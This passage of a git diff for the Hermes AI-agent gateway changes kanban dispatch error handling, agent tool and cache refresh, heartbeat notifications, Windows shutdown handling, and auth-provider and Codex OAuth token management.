if max_in_progress_per_profile < 1:
logger.warning(
"kanban dispatcher: kanban.max_in_progress_per_profile=%r is below 1; ignoring",
raw_per_profile,
)
max_in_progress_per_profile = None
else:
logger.info(
"kanban dispatcher: max_in_progress_per_profile=%d",
max_in_progress_per_profile,
)
# Initial delay so the gateway finishes wiring adapters before the
# dispatcher spawns workers (those workers may hit gateway notify
# subscriptions etc.). Matches the notifier watcher's delay.
@@ -5403,7 +5474,13 @@ class GatewayRunner:
HEALTH_WINDOW = 6
bad_ticks = 0
last_warn_at = 0
disabled_corrupt_boards: dict[str, tuple[str, int | None, int | None]] = {}
# Avoid hot-looping corrupt-looking board DBs, but do not suppress
# same-fingerprint retries forever: transient WAL/open races can
# surface as "database disk image is malformed" for one tick.
CORRUPT_BOARD_RETRY_AFTER_SECONDS = 300
disabled_corrupt_boards: dict[
str, tuple[tuple[str, int | None, int | None], float]
] = {}
def _board_db_fingerprint(slug: str) -> tuple[str, int | None, int | None]:
path = _kb.kanban_db_path(slug)
@@ -5418,6 +5495,9 @@ class GatewayRunner:
return (resolved, stat.st_mtime_ns, stat.st_size)
def _is_corrupt_board_db_error(exc: Exception) -> bool:
corrupt_guard_error = getattr(_kb, "KanbanDbCorruptError", None)
if corrupt_guard_error is not None and isinstance(exc, corrupt_guard_error):
return True
if not isinstance(exc, sqlite3.DatabaseError):
return False
msg = str(exc).lower()
@@ -5437,14 +5517,27 @@ class GatewayRunner:
"""
conn = None
fingerprint = _board_db_fingerprint(slug)
disabled_fingerprint = disabled_corrupt_boards.get(slug)
if disabled_fingerprint == fingerprint:
return None
if disabled_fingerprint is not None:
logger.info(
"kanban dispatcher: board %s database changed; retrying dispatch",
slug,
)
disabled_entry = disabled_corrupt_boards.get(slug)
if disabled_entry is not None:
disabled_fingerprint, disabled_at = disabled_entry
age = time.monotonic() - disabled_at
if (
disabled_fingerprint == fingerprint
and age < CORRUPT_BOARD_RETRY_AFTER_SECONDS
):
return None
if disabled_fingerprint == fingerprint:
logger.info(
"kanban dispatcher: board %s database fingerprint unchanged "
"after %.0fs quarantine; retrying dispatch",
slug,
age,
)
else:
logger.info(
"kanban dispatcher: board %s database changed; retrying dispatch",
slug,
)
disabled_corrupt_boards.pop(slug, None)
try:
conn = _kb.connect(board=slug)
@@ -5461,23 +5554,37 @@ class GatewayRunner:
max_in_progress=max_in_progress,
failure_limit=failure_limit,
stale_timeout_seconds=stale_timeout_seconds,
default_assignee=default_assignee,
max_in_progress_per_profile=max_in_progress_per_profile,
)
except sqlite3.DatabaseError as exc:
if _is_corrupt_board_db_error(exc):
disabled_corrupt_boards[slug] = fingerprint
disabled_corrupt_boards[slug] = (fingerprint, time.monotonic())
logger.error(
"kanban dispatcher: board %s database %s is not a valid "
"SQLite database; disabling dispatch for this board "
"until the file changes or the gateway restarts. Move "
"or restore the file, then run `hermes kanban init` if "
"you need a fresh board.",
"SQLite database; pausing dispatch for this board until "
"the file changes, the gateway restarts, or the "
"quarantine timer expires. Move or restore the file, "
"then run `hermes kanban init` if you need a fresh board.",
slug,
fingerprint[0],
)
return None
logger.exception("kanban dispatcher: tick failed on board %s", slug)
return None
except Exception:
except Exception as exc:
if _is_corrupt_board_db_error(exc):
disabled_corrupt_boards[slug] = (fingerprint, time.monotonic())
logger.error(
"kanban dispatcher: board %s database %s is not a valid "
"SQLite database; pausing dispatch for this board until "
"the file changes, the gateway restarts, or the "
"quarantine timer expires. Move or restore the file, "
"then run `hermes kanban init` if you need a fresh board.",
slug,
fingerprint[0],
)
return None
logger.exception("kanban dispatcher: tick failed on board %s", slug)
return None
finally:
@@ -5636,6 +5743,19 @@ class GatewayRunner:
"kanban dispatcher: embedded in gateway (interval=%.1fs)", interval
)
while self._running:
try:
# Reap zombie children before per-board work so a board DB
# failure cannot block cleanup of unrelated workers.
pids = await asyncio.to_thread(_kb.reap_worker_zombies)
if pids:
logger.info(
"kanban dispatcher: reaped %d zombie worker(s), pids=%s",
len(pids),
pids,
)
except Exception:
logger.exception("kanban dispatcher: zombie reaper failed")
try:
if auto_decompose_enabled:
await asyncio.to_thread(_auto_decompose_tick)
@@ -6294,7 +6414,7 @@ class GatewayRunner:
check_wecom_callback_requirements,
)
if not check_wecom_callback_requirements():
logger.warning("WeComCallback: aiohttp/httpx not installed")
logger.warning("WeComCallback: aiohttp/httpx/defusedxml not installed")
return None
return WecomCallbackAdapter(config)
@@ -7025,6 +7145,13 @@ class GatewayRunner:
if _denied is not None:
return _denied
# Telegram sends /start for bot launches/deep-links. Treat it as a
# platform ping, not a user command: no help dump, no agent
# interrupt, no queued text.
if _cmd_def_inner and _cmd_def_inner.name == "start":
logger.info("Ignoring /start platform ping for active session %s", _quick_key)
return ""
if _cmd_def_inner and _cmd_def_inner.name == "restart":
return await self._handle_restart_command(event)
@@ -7458,6 +7585,10 @@ class GatewayRunner:
if canonical == "help":
return await self._handle_help_command(event)
if canonical == "start":
logger.info("Ignoring /start platform ping for session %s", _quick_key)
return ""
if canonical == "commands":
return await self._handle_commands_command(event)
@@ -7938,7 +8069,8 @@ class GatewayRunner:
"🎤 I received your voice message but can't transcribe it — "
"no speech-to-text provider is configured.\n\n"
"To enable voice: install faster-whisper "
"(`pip install faster-whisper` in the Hermes venv) "
"(`uv pip install faster-whisper` in the Hermes venv; "
"`pip install faster-whisper` also works if pip is on PATH) "
"and set `stt.enabled: true` in config.yaml, "
"then /restart the gateway."
)
@@ -10161,8 +10293,16 @@ class GatewayRunner:
raw_args = event.get_command_args().strip()
# Parse --provider and --global flags
model_input, explicit_provider, persist_global = parse_model_flags(raw_args)
# Parse --provider, --global, and --refresh flags
model_input, explicit_provider, persist_global, force_refresh = parse_model_flags(raw_args)
# --refresh: bust the disk cache so the picker shows live data.
if force_refresh:
try:
from hermes_cli.models import clear_provider_models_cache
clear_provider_models_cache()
except Exception:
pass
# Read current model/provider from config
current_model = ""
@@ -11736,6 +11876,7 @@ class GatewayRunner:
session_id=task_id,
platform=platform_key,
user_id=source.user_id,
user_id_alt=source.user_id_alt,
user_name=source.user_name,
chat_id=source.chat_id,
chat_name=source.chat_name,
@@ -13339,6 +13480,40 @@ class GatewayRunner:
else:
lines.append(t("gateway.reload_mcp.tools_available", tools=len(new_tools), servers=len(connected_servers)))
# Refresh cached agents so existing sessions see new MCP tools on
# their next turn — without this, the user has to `/new` (which
# discards conversation history) to pick up tools from a server
# that was just added or reconnected. The user has already
# consented to the prompt-cache invalidation via the slash-confirm
# gate in _handle_reload_mcp_command before we reach this point.
try:
from model_tools import get_tool_definitions
_cache = getattr(self, "_agent_cache", None)
_cache_lock = getattr(self, "_agent_cache_lock", None)
if _cache_lock is not None and _cache:
with _cache_lock:
for _sess_key, _entry in list(_cache.items()):
try:
_agent = _entry[0] if isinstance(_entry, tuple) else _entry
except Exception:
continue
if _agent is None:
continue
new_defs = get_tool_definitions(
enabled_toolsets=getattr(_agent, "enabled_toolsets", None),
disabled_toolsets=getattr(_agent, "disabled_toolsets", None),
quiet_mode=True,
)
_agent.tools = new_defs
_agent.valid_tool_names = {
t["function"]["name"] for t in new_defs
} if new_defs else set()
except Exception as _exc:
logger.debug(
"Failed to update cached agent tools after MCP reload: %s",
_exc,
)
# Inject a message at the END of the session history so the
# model knows tools changed on its next turn. Appended after
# all existing messages to preserve prompt-cache for the prefix.
@@ -15004,6 +15179,29 @@ class GatewayRunner:
out["tools.registry_generation"] = getattr(registry, "_generation", None)
except Exception:
out["tools.registry_generation"] = None
# Honcho identity-mapping keys live in honcho.json, not user_config.
# HonchoSessionManager freezes the resolved peer_name / ai_peer /
# pin / aliases / prefix at construction; without busting here,
# mid-flight honcho.json edits go unread until the next unrelated
# cache eviction.
try:
from plugins.memory.honcho.client import HonchoClientConfig
hcfg = HonchoClientConfig.from_global_config()
out["honcho.peer_name"] = hcfg.peer_name
out["honcho.ai_peer"] = hcfg.ai_peer
out["honcho.pin_peer_name"] = bool(hcfg.pin_peer_name)
out["honcho.runtime_peer_prefix"] = hcfg.runtime_peer_prefix or ""
aliases = hcfg.user_peer_aliases or {}
out["honcho.user_peer_aliases"] = sorted(aliases.items()) if isinstance(aliases, dict) else []
except Exception:
out["honcho.peer_name"] = None
out["honcho.ai_peer"] = None
out["honcho.pin_peer_name"] = None
out["honcho.runtime_peer_prefix"] = None
out["honcho.user_peer_aliases"] = None
return out
@staticmethod
@@ -15013,6 +15211,8 @@ class GatewayRunner:
enabled_toolsets: list,
ephemeral_prompt: str,
cache_keys: dict | None = None,
user_id: str | None = None,
user_id_alt: str | None = None,
) -> str:
"""Compute a stable string key from agent config values.
@@ -15026,6 +15226,20 @@ class GatewayRunner:
the output of ``_extract_cache_busting_config(user_config)`` so
edits to model.context_length / compression.* in config.yaml are
picked up on the next gateway message without a manual restart.
``user_id`` and ``user_id_alt`` are the runtime user identities
carried by the current message's gateway source. They participate
in the cache key because the Honcho memory provider freezes them
into ``HonchoSessionManager`` at first-message init (see
``plugins/memory/honcho/__init__.py::_do_session_init``). Without
them in the signature, a shared-thread session_key (one in which
``build_session_key`` intentionally omits the participant ID,
e.g. ``thread_sessions_per_user=False``) would reuse the cached
AIAgent across distinct users, causing the second user's messages
to be attributed to the first user's resolved Honcho peer. This
broke #27371's per-user-peer contract in multi-user gateways.
Per-user agent rebuilds in shared threads trade prompt-cache
warmth for correct memory attribution.
"""
import hashlib, json as _j
@@ -15050,6 +15264,8 @@ class GatewayRunner:
# cached agent and doesn't affect system prompt or tools.
ephemeral_prompt or "",
_cache_keys_sorted,
str(user_id or ""),
str(user_id_alt or ""),
],
sort_keys=True,
default=str,
@@ -15829,9 +16045,13 @@ class GatewayRunner:
# in chat platforms while opting into concise mid-turn updates.
interim_assistant_messages_enabled = (
source.platform != Platform.WEBHOOK
and is_truthy_value(
display_config.get("interim_assistant_messages"),
default=True,
and bool(
resolve_display_setting(
user_config,
platform_key,
"interim_assistant_messages",
True,
)
)
)
@@ -15844,7 +16064,7 @@ class GatewayRunner:
# Auto-cleanup of temporary progress bubbles (Telegram + any adapter
# that implements ``delete_message``). When enabled via
# ``display.platforms.<platform>.cleanup_progress: true``, message IDs
# from the tool-progress / "Still working..." / status-callback bubbles
# from the tool-progress / "⏳ Working — N min" / status-callback bubbles
# are collected here and deleted after the final response lands.
# Failed runs skip cleanup so the bubbles remain as breadcrumbs.
_cleanup_progress = bool(
@@ -16587,6 +16807,8 @@ class GatewayRunner:
enabled_toolsets,
combined_ephemeral,
cache_keys=self._extract_cache_busting_config(user_config),
user_id=getattr(source, "user_id", None),
user_id_alt=getattr(source, "user_id_alt", None),
)
agent = None
_cache_lock = getattr(self, "_agent_cache_lock", None)
@@ -16630,6 +16852,7 @@ class GatewayRunner:
session_id=session_id,
platform=platform_key,
user_id=source.user_id,
user_id_alt=source.user_id_alt,
user_name=source.user_name,
chat_id=source.chat_id,
chat_name=source.chat_name,
@@ -17368,6 +17591,15 @@ class GatewayRunner:
# 0 = disable notifications.
_NOTIFY_INTERVAL_RAW = _float_env("HERMES_AGENT_NOTIFY_INTERVAL", 180)
_NOTIFY_INTERVAL = _NOTIFY_INTERVAL_RAW if _NOTIFY_INTERVAL_RAW > 0 else None
if not bool(
resolve_display_setting(
user_config,
platform_key,
"long_running_notifications",
True,
)
):
_NOTIFY_INTERVAL = None
_notify_start = time.time()
async def _notify_long_running():
@@ -17376,35 +17608,69 @@ class GatewayRunner:
_notify_adapter = self.adapters.get(source.platform)
if not _notify_adapter:
return
# Track the heartbeat message id so we can edit-in-place on
# platforms that support it (Telegram, Discord, Slack, etc.)
# instead of spamming a new "Still working" bubble every
# interval. Falls back to send-new when edit fails or isn't
# supported by the adapter.
_heartbeat_msg_id: Optional[str] = None
while True:
await asyncio.sleep(_NOTIFY_INTERVAL)
_elapsed_mins = int((time.time() - _notify_start) // 60)
# Include agent activity context if available.
# Include agent activity context if available. Default
# heartbeat is terse: elapsed + current tool. Verbose
# iteration counter is gated on busy_ack_detail so users
# who want it can opt in per platform.
_agent_ref = agent_holder[0]
_status_detail = ""
_want_iteration_detail = bool(
resolve_display_setting(
user_config,
platform_key,
"busy_ack_detail",
True,
)
)
if _agent_ref and hasattr(_agent_ref, "get_activity_summary"):
try:
_a = _agent_ref.get_activity_summary()
_parts = [f"iteration {_a['api_call_count']}/{_a['max_iterations']}"]
if _a.get("current_tool"):
_parts.append(f"running: {_a['current_tool']}")
else:
_parts.append(_a.get("last_activity_desc", ""))
_status_detail = "" + ", ".join(_parts)
_parts = []
if _want_iteration_detail:
_parts.append(
f"iteration {_a['api_call_count']}/{_a['max_iterations']}"
)
_action = _a.get("current_tool") or _a.get("last_activity_desc")
if _action:
_parts.append(str(_action))
if _parts:
_status_detail = "" + ", ".join(_parts)
except Exception:
pass
_heartbeat_text = f"⏳ Working — {_elapsed_mins} min{_status_detail}"
try:
_notify_res = await _notify_adapter.send(
source.chat_id,
f"⏳ Still working... ({_elapsed_mins} min elapsed{_status_detail})",
metadata=_status_thread_metadata,
)
if (
_cleanup_progress
and getattr(_notify_res, "success", False)
and getattr(_notify_res, "message_id", None)
):
_cleanup_msg_ids.append(str(_notify_res.message_id))
_notify_res = None
if _heartbeat_msg_id:
try:
_notify_res = await _notify_adapter.edit_message(
source.chat_id,
_heartbeat_msg_id,
_heartbeat_text,
)
except Exception as _ee:
logger.debug("Heartbeat edit failed: %s", _ee)
_notify_res = None
if not (_notify_res and getattr(_notify_res, "success", False)):
_notify_res = await _notify_adapter.send(
source.chat_id,
_heartbeat_text,
metadata=_status_thread_metadata,
)
if getattr(_notify_res, "success", False) and getattr(
_notify_res, "message_id", None
):
_heartbeat_msg_id = str(_notify_res.message_id)
if _cleanup_progress:
_cleanup_msg_ids.append(_heartbeat_msg_id)
except Exception as _ne:
logger.debug("Long-running notification error: %s", _ne)
@@ -17987,6 +18253,72 @@ class GatewayRunner:
return response
def _run_planned_stop_watcher(
stop_event: threading.Event,
runner,
loop: asyncio.AbstractEventLoop,
shutdown_handler,
*,
poll_interval: float = 0.5,
) -> None:
"""Poll for the planned-stop marker and trigger graceful shutdown.
On Windows, ``asyncio.add_signal_handler`` raises NotImplementedError
for SIGTERM/SIGINT, so the standard signal-driven shutdown path
never runs when ``hermes gateway stop`` signals the gateway. The
consequence is that the drain loop is skipped in-flight agent
sessions are killed mid-turn and ``resume_pending`` is never set,
so the next gateway boot has no idea those sessions need to be
auto-resumed (issue #33778, v0.13.0 session-resume feature broken
on native Windows).
This watcher runs on every platform (cheap, defensive) and bridges
the gap on Windows by translating a filesystem marker into the
same shutdown-handler invocation a real SIGTERM would have produced
on POSIX. The CLI's ``hermes_cli.gateway_windows.stop()`` writes
the marker via ``write_planned_stop_marker(pid)`` and then waits
for the gateway PID to exit; this watcher is what makes that
exit happen cleanly.
On POSIX this is a no-op safety net the signal handler always
races us to consuming the marker file because it fires synchronously
from the kernel's signal delivery.
Args:
stop_event: cleared by start_gateway() during normal shutdown
to tell the watcher to exit.
runner: the GatewayRunner instance; we check ``_running`` and
``_draining`` to avoid triggering shutdown if the gateway
is already in one of those states.
loop: the asyncio event loop the shutdown handler must run on.
shutdown_handler: same callable that's wired to SIGTERM —
tolerates a ``None`` signal argument (planned stop case)
and consumes the marker via
``consume_planned_stop_marker_for_self()``.
poll_interval: seconds between marker checks. 0.5s gives a
responsive shutdown without burning CPU.
"""
from gateway.status import _get_planned_stop_marker_path
marker_path = _get_planned_stop_marker_path()
while not stop_event.is_set():
try:
if (
marker_path.exists()
and not getattr(runner, "_draining", False)
and getattr(runner, "_running", False)
):
# Drive the same path as a real signal handler.
# Pass signal=None — the handler tolerates that and consumes
# the marker via consume_planned_stop_marker_for_self,
# which also validates target_pid + start_time match us.
loop.call_soon_threadsafe(shutdown_handler, None)
# Done — the handler will set _draining; we exit on next tick.
break
except Exception as _e:
logger.debug("Planned-stop watcher tick error: %s", _e)
stop_event.wait(poll_interval)
def _start_cron_ticker(stop_event: threading.Event, adapters=None, loop=None, interval: int = 60):
"""
Background thread that ticks the cron scheduler at a regular interval.
@@ -18391,7 +18723,28 @@ async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool =
pass
else:
logger.info("Skipping signal handlers (not running in main thread).")
# Windows fallback: asyncio.add_signal_handler raises NotImplementedError
# on Windows, so `hermes gateway stop`'s SIGTERM (which Python maps to
# TerminateProcess on Windows) never invokes shutdown_signal_handler.
# That means the drain loop never runs, mark_resume_pending never fires,
# and sessions are silently lost across restarts (issue #33778).
#
# The fix is a marker-polling thread: `hermes gateway stop` writes the
# planned-stop marker BEFORE killing, and this thread notices it and
# drives the same shutdown path the signal handler would have. Runs
# on every platform (cheap, defensive) so non-signal-bearing
# environments (Windows native, sandboxed CI runners that mask
# SIGTERM) still get a clean drain.
_planned_stop_watcher_stop = threading.Event()
_planned_stop_watcher_thread = threading.Thread(
target=_run_planned_stop_watcher,
args=(_planned_stop_watcher_stop, runner, loop, shutdown_signal_handler),
daemon=True,
name="planned-stop-watcher",
)
_planned_stop_watcher_thread.start()
# Claim the PID file BEFORE bringing up any platform adapters.
# This closes the --replace race window: two concurrent `gateway run
# --replace` invocations both pass the termination-wait above, but
@@ -18469,6 +18822,10 @@ async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool =
cron_stop.set()
cron_thread.join(timeout=5)
# Stop the planned-stop watcher (daemon=True so this is belt-and-suspenders).
_planned_stop_watcher_stop.set()
_planned_stop_watcher_thread.join(timeout=2)
# Close MCP server connections
try:
from tools.mcp_tool import shutdown_mcp_servers
+14 -9
View File
@@ -552,11 +552,6 @@ class GatewayStreamConsumer:
self._last_edit_time = time.monotonic()
if got_done:
# Record that the final content reached the user even
# if the cosmetic final edit below fails.
if current_update_visible and self._accumulated:
self._final_content_delivered = True
# Final edit without cursor. If progressive editing failed
# mid-stream, send a single continuation/fallback message
# here instead of letting the base gateway path send the
@@ -573,6 +568,7 @@ class GatewayStreamConsumer:
# final edit — but only for adapters that don't
# need an explicit finalize signal.
self._final_response_sent = True
self._final_content_delivered = True
elif self._message_id:
# Either the mid-stream edit didn't run (no
# visible update this tick) OR the adapter needs
@@ -580,8 +576,12 @@ class GatewayStreamConsumer:
self._final_response_sent = await self._send_or_edit(
self._accumulated, finalize=True,
)
if self._final_response_sent:
self._final_content_delivered = True
elif not self._already_sent:
self._final_response_sent = await self._send_or_edit(self._accumulated)
if self._final_response_sent:
self._final_content_delivered = True
return
if commentary_text is not None:
@@ -641,6 +641,7 @@ class GatewayStreamConsumer:
# "Let me search…") had been delivered, not the real answer.
if _best_effort_ok and not self._final_response_sent:
self._final_response_sent = True
self._final_content_delivered = True
except Exception as e:
logger.error("Stream consumer error: %s", e)
@@ -778,6 +779,7 @@ class GatewayStreamConsumer:
pass
self._already_sent = True
self._final_response_sent = True
self._final_content_delivered = True
return
raw_limit = getattr(self.adapter, "MAX_MESSAGE_LENGTH", 4096)
@@ -814,11 +816,13 @@ class GatewayStreamConsumer:
if not result or not result.success:
if sent_any_chunk:
# Some continuation text already reached the user. Suppress
# the base gateway final-send path so we don't resend the
# full response and create another duplicate.
# Some continuation text already reached the user, but not
# the full response. Do NOT set _final_response_sent — the
# base gateway final-send path should still deliver the
# complete response so the user gets the full answer.
# Suppress only _already_sent to avoid a duplicate send
# of the same partial content.
self._already_sent = True
self._final_response_sent = True
self._message_id = last_message_id
self._last_sent_text = last_successful_chunk
self._fallback_prefix = ""
@@ -856,6 +860,7 @@ class GatewayStreamConsumer:
self._message_id = last_message_id
self._already_sent = True
self._final_response_sent = True
self._final_content_delivered = True
self._last_sent_text = chunks[-1]
self._fallback_prefix = ""
+2 -2
View File
@@ -14,8 +14,8 @@ Provides subcommands for:
import os
import sys
__version__ = "0.14.0"
__release_date__ = "2026.5.16"
__version__ = "0.15.1"
__release_date__ = "2026.5.29"
def _ensure_utf8():
+386 -58
View File
@@ -379,14 +379,6 @@ PROVIDER_REGISTRY: Dict[str, ProviderConfig] = {
api_key_env_vars=("NVIDIA_API_KEY",),
base_url_env_var="NVIDIA_BASE_URL",
),
"ai-gateway": ProviderConfig(
id="ai-gateway",
name="Vercel AI Gateway",
auth_type="api_key",
inference_base_url="https://ai-gateway.vercel.sh/v1",
api_key_env_vars=("AI_GATEWAY_API_KEY",),
base_url_env_var="AI_GATEWAY_BASE_URL",
),
"opencode-zen": ProviderConfig(
id="opencode-zen",
name="OpenCode Zen",
@@ -402,6 +394,7 @@ PROVIDER_REGISTRY: Dict[str, ProviderConfig] = {
# OpenCode Go mixes API surfaces by model:
# - GLM / Kimi use OpenAI-compatible chat completions under /v1
# - MiniMax models use Anthropic Messages under /v1/messages
# - Qwen 3.7 uses Anthropic Messages under /v1/messages
# Keep the provider base at /v1 and select api_mode per-model.
inference_base_url="https://opencode.ai/zen/go/v1",
api_key_env_vars=("OPENCODE_GO_API_KEY",),
@@ -736,6 +729,12 @@ def _resolve_zai_base_url(api_key: str, default_url: str, env_override: str) ->
# Error Types
# =============================================================================
# Error code marking upstream rate-limit / usage-quota exhaustion (HTTP 429).
# Such failures are transient and re-authenticating cannot resolve them, so
# they must be kept distinct from missing/expired-credential errors.
CODEX_RATE_LIMITED_CODE = "codex_rate_limited"
class AuthError(RuntimeError):
"""Structured auth error with UX mapping hints."""
@@ -753,25 +752,68 @@ class AuthError(RuntimeError):
self.relogin_required = relogin_required
def is_rate_limited_auth_error(error: Exception) -> bool:
"""True when an :class:`AuthError` represents upstream rate-limiting / quota
exhaustion rather than missing or invalid credentials.
These failures are transient re-authenticating cannot resolve them so
callers should surface a "retry later" notice and prefer a fallback chain
instead of prompting the operator to run ``hermes auth``.
"""
return (
isinstance(error, AuthError)
and not error.relogin_required
and error.code == CODEX_RATE_LIMITED_CODE
)
def _parse_retry_after_seconds(headers: Any) -> Optional[int]:
"""Best-effort parse of a ``Retry-After`` header into whole seconds.
Supports the delta-seconds form (e.g. ``"120"``). HTTP-date forms and
missing/unparseable values return ``None`` rather than guessing.
"""
if headers is None:
return None
try:
raw = headers.get("retry-after")
except Exception:
return None
if raw is None:
return None
try:
seconds = int(str(raw).strip())
except (TypeError, ValueError):
return None
return seconds if seconds >= 0 else None
def format_auth_error(error: Exception) -> str:
"""Map auth failures to concise user-facing guidance."""
if not isinstance(error, AuthError):
return str(error)
# Rate-limit / quota errors are not credential problems — never append the
# "re-authenticate" remediation, which would mislead the operator.
if is_rate_limited_auth_error(error):
return str(error)
if error.relogin_required:
return f"{error} Run `hermes model` to re-authenticate."
if error.code == "subscription_required":
return (
"No active paid subscription found on Nous Portal. "
"Please purchase/activate a subscription, then retry."
)
if error.provider == "nous":
return _format_nous_entitlement_auth_error(error)
return "No active paid subscription found. Please purchase/activate a subscription, then retry."
if error.code == "insufficient_credits":
return (
"Subscription credits are exhausted. "
"Top up/renew credits in Nous Portal, then retry."
)
if error.provider == "nous":
return _format_nous_entitlement_auth_error(error)
return "Subscription credits are exhausted. Top up/renew credits, then retry."
if error.code in {"subscription_expired", "no_usable_credits", "account_missing"}:
if error.provider == "nous":
return _format_nous_entitlement_auth_error(error)
if error.code == "temporarily_unavailable":
return f"{error} Please retry in a few seconds."
@@ -779,6 +821,25 @@ def format_auth_error(error: Exception) -> str:
return str(error)
def _format_nous_entitlement_auth_error(error: AuthError) -> str:
try:
from hermes_cli.nous_account import (
format_nous_portal_entitlement_message,
get_nous_portal_account_info,
)
account_info = get_nous_portal_account_info(force_fresh=True)
message = format_nous_portal_entitlement_message(
account_info,
capability="Nous model access",
)
if message:
return message
except Exception:
pass
return f"{error} Check credits or billing in Nous Portal, then retry."
def _token_fingerprint(token: Any) -> Optional[str]:
"""Return a short hash fingerprint for telemetry without leaking token bytes."""
if not isinstance(token, str):
@@ -1085,11 +1146,32 @@ def _save_auth_store(auth_store: Dict[str, Any]) -> Path:
def _load_provider_state(auth_store: Dict[str, Any], provider_id: str) -> Optional[Dict[str, Any]]:
"""Return a provider's persisted state.
In profile mode, falls back to the global-root ``auth.json`` when the
profile has no entry for ``provider_id``. This mirrors the per-provider
shadowing already used by ``read_credential_pool``: workers spawned in a
profile can see providers (e.g. ``nous``) that were only authenticated at
global scope. Once the user runs ``hermes auth login <provider>`` inside
the profile, the profile state fully shadows the global state on the next
read. See issue #18594 follow-up.
"""
providers = auth_store.get("providers")
if not isinstance(providers, dict):
return None
state = providers.get(provider_id)
return dict(state) if isinstance(state, dict) else None
if isinstance(providers, dict):
state = providers.get(provider_id)
if isinstance(state, dict):
return dict(state)
# Read-only fallback to the global-root auth store (profile mode only;
# returns empty dict in classic mode so this is a no-op).
global_store = _load_global_auth_store()
if global_store:
global_providers = global_store.get("providers")
if isinstance(global_providers, dict):
global_state = global_providers.get(provider_id)
if isinstance(global_state, dict):
return dict(global_state)
return None
def _save_provider_state(auth_store: Dict[str, Any], provider_id: str, state: Dict[str, Any]) -> None:
@@ -1243,23 +1325,18 @@ def unsuppress_credential_source(provider_id: str, source: str) -> bool:
def get_provider_auth_state(provider_id: str) -> Optional[Dict[str, Any]]:
"""Return persisted auth state for a provider, or None.
In profile mode, falls back to the global-root ``auth.json`` when the
profile has no state for this provider. Profile state always wins when
present. Writes (``_save_auth_store`` / ``persist_*_credentials``) are
unchanged they still target the profile only. This mirrors
In profile mode, ``_load_provider_state`` already falls back to the
global-root ``auth.json`` per-provider when the profile has no entry
so this is now a thin convenience wrapper. Profile state always wins
when present. Writes (``_save_auth_store`` / ``persist_*_credentials``)
are unchanged they still target the profile only. This mirrors
``read_credential_pool``'s per-provider shadowing semantics so that
``_seed_from_singletons`` can reseed a profile's credential pool from
global-scope provider state (e.g. a globally-authenticated Anthropic
OAuth or Nous device-code session). See issue #18594 follow-up.
"""
auth_store = _load_auth_store()
state = _load_provider_state(auth_store, provider_id)
if state is not None:
return state
global_store = _load_global_auth_store()
if not global_store:
return None
return _load_provider_state(global_store, provider_id)
return _load_provider_state(auth_store, provider_id)
def get_active_provider() -> Optional[str]:
@@ -1439,7 +1516,6 @@ def resolve_provider(
"github": "copilot", "github-copilot": "copilot",
"github-models": "copilot", "github-model": "copilot",
"github-copilot-acp": "copilot-acp", "copilot-acp-agent": "copilot-acp",
"aigateway": "ai-gateway", "vercel": "ai-gateway", "vercel-ai-gateway": "ai-gateway",
"opencode": "opencode-zen", "zen": "opencode-zen",
"qwen-portal": "qwen-oauth", "qwen-cli": "qwen-oauth", "qwen-oauth": "qwen-oauth", "google-gemini-cli": "google-gemini-cli", "gemini-cli": "google-gemini-cli", "gemini-oauth": "google-gemini-cli",
"hf": "huggingface", "hugging-face": "huggingface", "huggingface-hub": "huggingface",
@@ -3105,6 +3181,9 @@ def _prompt_manual_callback_paste(redirect_uri: str) -> dict:
print("not on your laptop) — that is expected. Copy the FULL URL")
print("from your browser's address bar of that failed page and paste")
print("it below. A bare '?code=...&state=...' fragment also works.")
print("If the consent page shows the authorization code in-page")
print("(xAI's current behavior) rather than redirecting, paste the")
print("bare code value on its own.")
print("───────────────────────────────────────────────────────────────")
try:
raw = input("Callback URL: ")
@@ -3231,6 +3310,77 @@ def _read_codex_tokens(*, _lock: bool = True) -> Dict[str, Any]:
}
def _sync_codex_pool_entries(
auth_store: Dict[str, Any],
tokens: Dict[str, str],
last_refresh: Optional[str],
) -> None:
"""Mirror a fresh Codex re-auth into the credential_pool OAuth entries.
The runtime selects credentials from ``credential_pool.openai-codex``, not
from ``providers.openai-codex.tokens``. A re-auth invalidates the prior
OAuth pair server-side, but pool entries keep holding the now-consumed
refresh token plus any stale error markers so the next request spends a
dead token and gets a 401 ``token_invalidated``.
What gets refreshed:
* ``device_code`` the singleton-seeded entry written by the device-code
OAuth flow when the user logged in via ``hermes setup`` / the model
picker. Always synced with the fresh tokens.
* ``manual:device_code`` entries created by ``hermes auth add openai-codex``
that use the same device-code OAuth mechanism. An interactive re-auth
proves the user owns the ChatGPT account, so it is safe (and expected)
to refresh these entries too. Without this, a user who once ran the
``hermes auth add`` workaround for #33000 would silently leave that
manual entry stale on every subsequent re-auth, recreating the issue
reported in #33538.
What does NOT get refreshed:
* ``manual:api_key`` and any other non-device-code manual sources those
are independent credentials (an explicit API key, a different ChatGPT
account, etc.) and must not be overwritten by a single re-auth.
Error markers (``last_status``, ``last_error_*``) are also cleared on
every device-code-backed entry even those whose tokens we did not
rewrite so that an interactive re-auth gives every relevant pool entry
a fresh selection chance instead of leaving them marked unhealthy from a
pre-re-auth 401.
"""
access_token = tokens.get("access_token")
if not access_token:
return
refresh_token = tokens.get("refresh_token")
pool = auth_store.get("credential_pool")
if not isinstance(pool, dict):
return
entries = pool.get("openai-codex")
if not isinstance(entries, list):
return
# Sources whose tokens should be rewritten by a fresh Codex device-code
# OAuth re-auth. ``manual:api_key`` and unknown sources are intentionally
# excluded — they represent independent credentials.
REFRESHABLE_SOURCES = {"device_code", "manual:device_code"}
for entry in entries:
if not isinstance(entry, dict):
continue
source = entry.get("source")
if source not in REFRESHABLE_SOURCES:
continue
entry["access_token"] = access_token
if refresh_token:
entry["refresh_token"] = refresh_token
if last_refresh:
entry["last_refresh"] = last_refresh
entry["last_status"] = None
entry["last_status_at"] = None
entry["last_error_code"] = None
entry["last_error_reason"] = None
entry["last_error_message"] = None
entry["last_error_reset_at"] = None
def _save_codex_tokens(tokens: Dict[str, str], last_refresh: str = None) -> None:
"""Save Codex OAuth tokens to Hermes auth store (~/.hermes/auth.json)."""
if last_refresh is None:
@@ -3242,6 +3392,7 @@ def _save_codex_tokens(tokens: Dict[str, str], last_refresh: str = None) -> None
state["last_refresh"] = last_refresh
state["auth_mode"] = "chatgpt"
_save_provider_state(auth_store, "openai-codex", state)
_sync_codex_pool_entries(auth_store, tokens, last_refresh)
_save_auth_store(auth_store)
@@ -3273,6 +3424,30 @@ def refresh_codex_oauth_pure(
},
)
if response.status_code == 429:
